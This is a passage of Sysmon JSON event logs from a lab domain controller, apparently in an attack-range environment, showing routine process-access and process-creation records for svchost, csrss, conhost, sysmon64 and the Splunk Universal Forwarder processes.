05:53:53.127","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5809,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.127\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.127","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5810,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.127\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.127","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5811,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.127\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.127","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5812,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.127\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0371-5F25-0000-0010EEE00A00}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.127","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0371-5F25-0000-0010EEE00A00}","TargetProcessId":"3788","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5813,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.268\r\nSourceProcessGUID: {A837DB8D-0371-5F25-0000-0010EEE00A00}\r\nSourceProcessId: 3788\r\nSourceThreadId: 2464\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.268","SourceProcessGUID":"{A837DB8D-0371-5F25-0000-0010EEE00A00}","SourceProcessId":"3788","SourceThreadId":"2464","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5814,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.894\r\nProcessGuid: {A837DB8D-0371-5F25-0000-0010B6E20A00}\r\nProcessId: 4728\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.894","ProcessGuid":"{A837DB8D-0371-5F25-0000-0010B6E20A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5815,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.893\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0371-5F25-0000-0010B6E20A00}\r\nTargetProcessId: 4728\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.893","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0371-5F25-0000-0010B6E20A00}","TargetProcessId":"4728","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5816,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.893\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0371-5F25-0000-0010B6E20A00}\r\nTargetProcessId: 4728\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.893","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0371-5F25-0000-0010B6E20A00}","TargetProcessId":"4728","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5817,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.893\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 